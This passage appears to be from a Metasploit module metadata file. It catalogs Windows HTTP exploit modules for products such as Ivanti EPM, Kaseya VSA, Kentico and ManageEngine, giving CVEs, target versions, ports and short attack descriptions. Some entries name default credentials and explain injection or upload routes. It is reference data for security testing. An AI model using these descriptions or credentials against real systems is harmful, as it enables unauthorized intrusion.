"URL-https://forums.ivanti.com/s/article/Security-Advisory-May-2024", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-24-507", - 
"URL-https://github.com/horizon3ai/CVE-2024-29824", - "URL-https://www.horizon3.ai/attack-research/attack-blogs/cve-2024-29824-deep-dive-ivanti-epm-sql-injection-remote-code-execution-vulnerability/", - "CVE-2024-29824" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic Target" - ], - "mod_time": "2024-06-21 10:13:08 +0000", - "path": "/modules/exploits/windows/http/ivanti_epm_recordgoodapp_sqli_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/ivanti_epm_recordgoodapp_sqli_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/jira_collector_traversal": { - "name": "JIRA Issues Collector Directory Traversal", - "fullname": "exploit/windows/http/jira_collector_traversal", - "aliases": [], - "rank": 300, - "disclosure_date": "2014-02-26", - "type": "exploit", - "author": [ - "Philippe Arteau", - "juan vazquez " - ], - "description": "This module exploits a directory traversal flaw in JIRA 6.0.3. The vulnerability exists\n in the issues collector code, while handling attachments provided by the user. It can be\n exploited in Windows environments to get remote code execution. 
This module has been tested\n successfully on JIRA 6.0.3 with Windows 2003 SP2 Server.", - "references": [ - "CVE-2014-2314", - "OSVDB-103807", - "BID-65849", - "URL-https://confluence.atlassian.com/display/JIRA/JIRA+Security+Advisory+2014-02-26", - "URL-http://blog.h3xstream.com/2014/02/jira-path-traversal-explained.html" - ], - "platform": "Windows", - "arch": "", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Jira 6.0.3 / Windows 2003 SP2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/jira_collector_traversal.rb", - "is_install_path": true, - "ref_name": "windows/http/jira_collector_traversal", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kaseya_uploader": { - "name": "Kaseya VSA uploader.aspx Arbitrary File Upload", - "fullname": "exploit/windows/http/kaseya_uploader", - "aliases": [], - "rank": 600, - "disclosure_date": "2015-09-23", - "type": "exploit", - "author": [ - "Pedro Ribeiro " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya VSA versions\n between 7 and 9.1. A malicious unauthenticated user can upload an ASP file to an arbitrary\n directory leading to arbitrary code execution with IUSR privileges. 
This module has been\n tested with Kaseya v7.0.0.17, v8.0.0.10 and v9.0.0.3.", - "references": [ - "CVE-2015-6922", - "ZDI-15-449", - "URL-https://raw.githubusercontent.com/pedrib/PoC/master/advisories/Kaseya/kaseya-vsa-vuln-2.txt", - "URL-https://seclists.org/bugtraq/2015/Sep/132" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Kaseya VSA v7 to v9.1" - ], - "mod_time": "2022-01-13 18:47:11 +0000", - "path": "/modules/exploits/windows/http/kaseya_uploader.rb", - "is_install_path": true, - "ref_name": "windows/http/kaseya_uploader", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kaseya_uploadimage_file_upload": { - "name": "Kaseya uploadImage Arbitrary File Upload", - "fullname": "exploit/windows/http/kaseya_uploadimage_file_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2013-11-11", - "type": "exploit", - "author": [ - "Thomas Hibbert " - ], - "description": "This module exploits an arbitrary file upload vulnerability found in Kaseya versions below\n 6.3.0.2. 
A malicious user can upload an ASP file to an arbitrary directory without previous\n authentication, leading to arbitrary code execution with IUSR privileges.", - "references": [ - "OSVDB-99984", - "BID-63782", - "EDB-29675", - "URL-http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf" - ], - "platform": "Windows", - "arch": "x86", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Kaseya KServer / Windows" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/kaseya_uploadimage_file_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/kentico_staging_syncserver": { - "name": "Kentico CMS Staging SyncServer Unserialize Remote Command Execution", - "fullname": "exploit/windows/http/kentico_staging_syncserver", - "aliases": [], - "rank": 600, - "disclosure_date": "2019-04-15", - "type": "exploit", - "author": [ - "Manoj Cherukuri", - "Justin LeMay", - "aushack " - ], - "description": "This module exploits a vulnerability in the Kentico CMS platform versions 12.0.14 and earlier.\n Remote Command Execution is possible via unauthenticated XML requests to the Staging Service\n SyncServer.asmx interface ProcessSynchronizationTaskData method stagingTaskData parameter. 
XML\n input is passed to an insecure .NET deserialize call which allows for remote command execution.", - "references": [ - "CVE-2019-10068", - "URL-https://www.aon.com/cyber-solutions/aon_cyber_labs/unauthenticated-remote-code-execution-in-kentico-cms/" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic", - "Windows EXE Dropper", - "Windows Command", - "Windows Powershell" - ], - "mod_time": "2023-02-10 18:04:31 +0000", - "path": "/modules/exploits/windows/http/kentico_staging_syncserver.rb", - "is_install_path": true, - "ref_name": "windows/http/kentico_staging_syncserver", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "SideEffects": [ - "artifacts-on-disk", - "ioc-in-logs" - ], - "Reliability": [ - "repeatable-session" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/kolibri_http": { - "name": "Kolibri HTTP Server HEAD Buffer Overflow", - "fullname": "exploit/windows/http/kolibri_http", - "aliases": [], - "rank": 400, - "disclosure_date": "2010-12-26", - "type": "exploit", - "author": [ - "mr_me ", - "TheLeader", - "sinn3r " - ], - "description": "This exploits a stack buffer overflow in version 2 of the Kolibri HTTP server.", - "references": [ - "CVE-2002-2268", - "OSVDB-70808", - "BID-6289", - "EDB-15834" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows XP sp3", - "Windows Server 2003 sp2" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/kolibri_http.rb", - "is_install_path": true, - "ref_name": "windows/http/kolibri_http", - "check": true, - 
"post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/landesk_thinkmanagement_upload_asp": { - "name": "LANDesk Lenovo ThinkManagement Console Remote Command Execution", - "fullname": "exploit/windows/http/landesk_thinkmanagement_upload_asp", - "aliases": [], - "rank": 600, - "disclosure_date": "2012-02-15", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module can be used to execute a payload on LANDesk Lenovo\n ThinkManagement Suite 9.0.2 and 9.0.3.\n\n The payload is uploaded as an ASP script by sending a specially crafted\n SOAP request to \"/landesk/managementsuite/core/core.anonymous/ServerSetup.asmx\"\n , via a \"RunAMTCommand\" operation with the command '-PutUpdateFileCore'\n as the argument.\n\n After execution, the ASP script with the payload is deleted by sending\n another specially crafted SOAP request to \"WSVulnerabilityCore/VulCore.asmx\"\n via a \"SetTaskLogByFile\" operation.", - "references": [ - "CVE-2012-1195", - "CVE-2012-1196", - "OSVDB-79276", - "OSVDB-79277", - "BID-52023", - "EDB-18622", - "EDB-18623" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "LANDesk Lenovo ThinkManagement Suite 9.0.2 / 9.0.3 / Microsoft Windows Server 2003 SP2" - ], - "mod_time": "2017-07-24 06:26:21 +0000", - "path": "/modules/exploits/windows/http/landesk_thinkmanagement_upload_asp.rb", - "is_install_path": true, - "ref_name": "windows/http/landesk_thinkmanagement_upload_asp", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/lexmark_markvision_gfd_upload": { - "name": "Lexmark MarkVision Enterprise Arbitrary File Upload", - 
"fullname": "exploit/windows/http/lexmark_markvision_gfd_upload", - "aliases": [], - "rank": 600, - "disclosure_date": "2014-12-09", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module exploits a code execution flaw in Lexmark MarkVision Enterprise before version 2.1.\n A directory traversal vulnerability in the GfdFileUploadServlet servlet allows an unauthenticated\n attacker to upload arbitrary files, including arbitrary JSP code. This module has been\n tested successfully on Lexmark MarkVision Enterprise 2.0 with Windows 2003 SP2.", - "references": [ - "CVE-2014-8741", - "ZDI-14-410", - "URL-http://support.lexmark.com/index?page=content&id=TE666&locale=EN&userlocale=EN_US" - ], - "platform": "Windows", - "arch": "java", - "rport": 9788, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Lexmark Markvision Enterprise 2.0" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/lexmark_markvision_gfd_upload.rb", - "is_install_path": true, - "ref_name": "windows/http/lexmark_markvision_gfd_upload", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/lg_simple_editor_rce": { - "name": "LG Simple Editor Remote Code Execution", - "fullname": "exploit/windows/http/lg_simple_editor_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-24", - "type": "exploit", - "author": [ - "rgod", - "Ege Balcı " - ], - "description": "This Metasploit module exploits broken access control and directory traversal\n vulnerabilities in LG Simple Editor software for gaining code execution.\n The vulnerabilities exist in versions of LG Simple Editor prior to v3.21.\n By exploiting this flaw, an attacker can upload and execute a malicious JSP\n payload with the 
SYSTEM user permissions.", - "references": [ - "ZDI-23-1204", - "CVE-2023-40498" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "LG Simple Editor <= v3.21" - ], - "mod_time": "2023-09-07 17:00:17 +0000", - "path": "/modules/exploits/windows/http/lg_simple_editor_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/lg_simple_editor_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/lg_simple_editor_rce_uploadvideo": { - "name": "LG Simple Editor Command Injection (CVE-2023-40504)", - "fullname": "exploit/windows/http/lg_simple_editor_rce_uploadvideo", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-08-04", - "type": "exploit", - "author": [ - "rgod", - "Michael Heinzl" - ], - "description": "Unauthenticated Command Injection in LG Simple Editor <= v3.21.0.\n The vulnerability can be exploited by a remote attacker to inject arbitrary operating system commands which will get executed in the context of NT AUTHORITY\\SYSTEM.", - "references": [ - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-1208/", - "CVE-2023-40504" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows_Fetch" - ], - "mod_time": "2024-08-13 20:29:30 +0000", - "path": "/modules/exploits/windows/http/lg_simple_editor_rce_uploadvideo.rb", - "is_install_path": true, - "ref_name": "windows/http/lg_simple_editor_rce_uploadvideo", - "check": true, - "post_auth": 
false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/mailenable_auth_header": { - "name": "MailEnable Authorization Header Buffer Overflow", - "fullname": "exploit/windows/http/mailenable_auth_header", - "aliases": [], - "rank": 500, - "disclosure_date": "2005-04-24", - "type": "exploit", - "author": [ - "David Maciejak " - ], - "description": "This module exploits a remote buffer overflow in the MailEnable web service.\n The vulnerability is triggered when a large value is placed into the Authorization\n header of the web request. MailEnable Enterprise Edition versions prior to 1.0.5 and\n MailEnable Professional versions prior to 1.55 are affected.", - "references": [ - "CVE-2005-1348", - "OSVDB-15913", - "OSVDB-15737", - "BID-13350", - "URL-http://www.nessus.org/plugins/index.php?view=single&id=18123" - ], - "platform": "Windows", - "arch": "", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "MEHTTPS.exe Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/mailenable_auth_header.rb", - "is_install_path": true, - "ref_name": "windows/http/mailenable_auth_header", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manage_engine_opmanager_rce": { - "name": "ManageEngine OpManager Remote Code Execution", - "fullname": "exploit/windows/http/manage_engine_opmanager_rce", - "aliases": [], - "rank": 0, - "disclosure_date": "2015-09-14", - "type": "exploit", - "author": [ - "xistence " - ], - "description": "This module exploits a default credential vulnerability in ManageEngine 
OpManager, where a\n default hidden account \"IntegrationUser\" with administrator privileges exists. The account\n has a default password of \"plugin\" which cannot be reset through the user interface. By\n log-in and abusing the default administrator's SQL query functionality, it's possible to\n write a WAR payload to disk and trigger an automatic deployment of this payload. This\n module has been tested successfully on OpManager v11.0 and v11.4-v11.6 for Windows.", - "references": [ - "EDB-38174", - "CVE-2015-7765", - "CVE-2015-7766", - "URL-https://seclists.org/fulldisclosure/2015/Sep/66", - "URL-https://support.zoho.com/portal/manageengine/helpcenter/articles/pgsql-submitquery-do-vulnerability" - ], - "platform": "Java", - "arch": "java", - "rport": 80, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "ManageEngine OpManager <= v11.6" - ], - "mod_time": "2021-02-17 12:33:59 +0000", - "path": "/modules/exploits/windows/http/manage_engine_opmanager_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manage_engine_opmanager_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_adaudit_plus_authenticated_rce": { - "name": "ManageEngine ADAudit Plus Authenticated File Write RCE", - "fullname": "exploit/windows/http/manageengine_adaudit_plus_authenticated_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-10-01", - "type": "exploit", - "author": [ - "Moon", - "Erik Wynter" - ], - "description": "This module exploits security issues in ManageEngine ADAudit Plus\n prior to 7006 that allow authenticated users to execute arbitrary\n code by creating a custom alert profile and leveraging its custom\n alert script component.\n\n The module first runs a few checks to test the provided\n credentials, 
retrieve the configured domain(s) and obtain the\n build number of the target ADAudit Plus server.\n\n If the credentials are valid and the target is\n vulnerable, the module creates an alert profile that will be\n triggered for any failed login attempt to the configured domain.\n\n For versions prior to build 7004, the payload is directly inserted\n in the custom alert script component of the alert profile.\n\n For versions 7004 and 7005, the module leverages an arbitrary file\n write vulnerability (CVE-2021-42847) to create a Powershell script\n in the alert_scripts directory that contains the payload. The name\n of this script is then provided as the value for the custom alert\n script component of the alert profile.\n\n This module requires valid credentials for an account with the\n privileges to create alert scripts. It has been successfully tested\n against ManageEngine ADAudit Plus builds 7003 and 7005 running on\n Windows Server 2012 R2.\n\n Successful exploitation will result in RCE as the user running\n ManageEngine ADAudit Plus, which will typically be the local\n administrator.", - "references": [ - "CVE-2021-42847", - "URL-https://pitstop.manageengine.com/portal/en/community/topic/fix-released-for-a-vulnerability-in-manageengine-adaudit-plus", - "URL-https://www.manageengine.com/products/active-directory-audit/adaudit-plus-release-notes.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-04-15 11:06:50 +0000", - "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adaudit_plus_authenticated_rce", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - 
"Reliability": [ - "first-attempt-fail" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adaudit_plus_cve_2022_28219": { - "name": "ManageEngine ADAudit Plus CVE-2022-28219", - "fullname": "exploit/windows/http/manageengine_adaudit_plus_cve_2022_28219", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-06-29", - "type": "exploit", - "author": [ - "Naveen Sunkavally", - "Ron Bowes" - ], - "description": "This module exploits CVE-2022-28219, which is a pair of\n vulnerabilities in ManageEngine ADAudit Plus versions before build\n 7060: a path traversal in the /cewolf endpoint, and a blind XXE in,\n to upload and execute an executable file.", - "references": [ - "CVE-2022-28219", - "URL-https://www.horizon3.ai/red-team-blog-cve-2022-28219/", - "URL-https://attackerkb.com/topics/Zx3qJlmRGY/cve-2022-28219/rapid7-analysis", - "URL-https://www.manageengine.com/products/active-directory-audit/cve-2022-28219.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8081, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2024-09-05 08:49:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_adaudit_plus_cve_2022_28219.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adaudit_plus_cve_2022_28219", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection": { - "name": "ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection", - "fullname": 
"exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", - "aliases": [], - "rank": 600, - "disclosure_date": "2023-04-12", - "type": "exploit", - "author": [ - "Simon Humbert", - "Dinh Hoang", - "Grant Willcox" - ], - "description": "ManageEngine ADManager Plus prior to build 7181 is vulnerable to an authenticated command injection due to insufficient\n validation of user input when performing the ChangePasswordAction function before passing it into a string that is later\n used as an OS command to execute.\n\n By making a POST request to /api/json/admin/saveServerSettings with a params POST\n parameter containing a JSON array object that has a USERNAME or PASSWORD element containing a\n carriage return and newline, followed by the command the attacker wishes to execute, an attacker can gain RCE as the user\n running ADManager Plus, which will typically be the local administrator.\n\n Note that the attacker must be authenticated in order to send requests to /api/json/admin/saveServerSettings,\n so this vulnerability does require authentication to exploit.\n\n As this exploit modifies the HTTP proxy settings for the entire server, one cannot use fetch payloads\n with this exploit, since these will use HTTP connections that will be affected by the change in configuration.", - "references": [ - "CVE-2023-29084", - "URL-https://hnd3884.github.io/posts/CVE-2023-29084-Command-injection-in-ManageEngine-ADManager-plus/", - "URL-https://www.zerodayinitiative.com/advisories/ZDI-23-438/", - "URL-https://www.manageengine.com/products/ad-manager/admanager-kb/cve-2023-29084.html", - "URL-https://www.manageengine.com/products/ad-manager/release-notes.html" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8080, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2023-06-01 16:59:14 +0000", - 
"path": "/modules/exploits/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "config-changes" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adselfservice_plus_cve_2021_40539": { - "name": "ManageEngine ADSelfService Plus CVE-2021-40539", - "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539", - "aliases": [], - "rank": 600, - "disclosure_date": "2021-09-07", - "type": "exploit", - "author": [ - "Antoine Cervoise", - "Wilfried Bécard", - "mr_me", - "wvu " - ], - "description": "This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.", - "references": [ - "CVE-2021-40539", - "URL-https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html", - "URL-https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis", - "URL-https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html", - "URL-https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py" - ], - "platform": "Java", - "arch": "java", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Java Dropper" - ], - "mod_time": "2021-11-24 10:40:32 +0000", - "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", - 
"is_install_path": true, - "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2021_40539", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs", - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/http/manageengine_adselfservice_plus_cve_2022_28810": { - "name": "ManageEngine ADSelfService Plus Custom Script Execution", - "fullname": "exploit/windows/http/manageengine_adselfservice_plus_cve_2022_28810", - "aliases": [], - "rank": 600, - "disclosure_date": "2022-04-09", - "type": "exploit", - "author": [ - "Jake Baines", - "Hernan Diaz", - "Andrew Iwamaye", - "Dan Kelley" - ], - "description": "This module exploits the \"custom script\" feature of ADSelfService Plus. The\n feature was removed in build 6122 as part of the patch for CVE-2022-28810.\n For purposes of this module, a \"custom script\" is arbitrary operating system\n command execution.\n\n This module uses an attacker provided \"admin\" account to insert the malicious\n payload into the custom script fields. When a user resets their password or\n unlocks their account, the payload in the custom script will be executed.\n The payload will be executed as SYSTEM if ADSelfService Plus is installed as\n a service, which we believe is the normal operational behavior.\n\n This is a passive module because user interaction is required to trigger the\n payload. This module also does not automatically remove the malicious code from\n the remote target. 
Use the \"TARGET_RESET\" operation to remove the malicious\n custom script when you are done.\n\n ADSelfService Plus uses default credentials of \"admin\":\"admin\"", - "references": [ - "CVE-2022-28810", - "URL-https://www.manageengine.com/products/self-service-password/kb/cve-2022-28810.html", - "URL-https://www.rapid7.com/blog/post/2022/04/14/cve-2022-28810-manageengine-adselfservice-plus-authenticated-command-execution-fixed/" - ], - "platform": "Windows", - "arch": "cmd", - "rport": 8888, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Windows Command" - ], - "mod_time": "2022-04-20 15:22:07 +0000", - "path": "/modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2022_28810.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adselfservice_plus_cve_2022_28810", - "check": true, - "post_auth": true, - "default_credential": false, - "notes": { - "Stability": [ - "crash-safe" - ], - "Reliability": [ - "repeatable-session" - ], - "SideEffects": [ - "ioc-in-logs" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_adshacluster_rce": { - "name": "ManageEngine Exchange Reporter Plus Unauthenticated RCE", - "fullname": "exploit/windows/http/manageengine_adshacluster_rce", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-06-28", - "type": "exploit", - "author": [ - "Kacper Szurek " - ], - "description": "This module exploits a remote code execution vulnerability that\n exists in Exchange Reporter Plus <= 5310, caused by execution of\n bcp.exe file inside ADSHACluster servlet", - "references": [ - "URL-https://security.szurek.pl/en/manage-engine-exchange-reporter-plus-unauthenticated-rce/" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 8181, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - 
"autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2022-10-07 01:59:52 +0000", - "path": "/modules/exploits/windows/http/manageengine_adshacluster_rce.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_adshacluster_rce", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_appmanager_exec": { - "name": "ManageEngine Applications Manager Remote Code Execution", - "fullname": "exploit/windows/http/manageengine_appmanager_exec", - "aliases": [], - "rank": 600, - "disclosure_date": "2018-03-07", - "type": "exploit", - "author": [ - "Mehmet Ince " - ], - "description": "This module exploits command injection vulnerability in the ManageEngine Application Manager product.\n An unauthenticated user can execute a operating system command under the context of privileged user.\n\n Publicly accessible testCredential.do endpoint takes multiple user inputs and validates supplied credentials\n by accessing given system. 
This endpoint calls a several internal classes and then executes powershell script\n without validating user supplied parameter when the given system is OfficeSharePointServer.", - "references": [ - "CVE-2018-7890", - "BID-103358", - "URL-https://pentest.blog/advisory-manageengine-applications-manager-remote-code-execution-sqli-and/", - "URL-https://pitstop.manageengine.com/portal/community/topic/security-vulnerability-issues-fixed-upgrade-to-the-latest-version-of-applications-manager" - ], - "platform": "Windows", - "arch": "x86, x64", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/http/manageengine_appmanager_exec.rb", - "is_install_path": true, - "ref_name": "windows/http/manageengine_appmanager_exec", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/http/manageengine_apps_mngr": { - "name": "ManageEngine Applications Manager Authenticated Code Execution", - "fullname": "exploit/windows/http/manageengine_apps_mngr", - "aliases": [], - "rank": 200, - "disclosure_date": "2011-04-08", - "type": "exploit", - "author": [ - "Jacob Giannantonio " - ], - "description": "This module logs into the Manage Engine Applications Manager to upload a\n payload to the file system and a batch script that executes the payload.", - "references": [ - "EDB-17152" - ], - "platform": "Windows", - "arch": "", - "rport": 9090, - "autofilter_ports": [ - 80, - 8080, - 443, - 8000, - 8888, - 8880, - 8008, - 3000, - 8443 - ], - "autofilter_services": [ - "http", - "https" - ], - "targets": [ - "Automatic" - ], - "mod_time": "2018-08-20 18:08:19 +0000", - "path": "/modules/exploits/windows/http/manageengine_apps_mngr.rb", - "is_install_path": true, - 
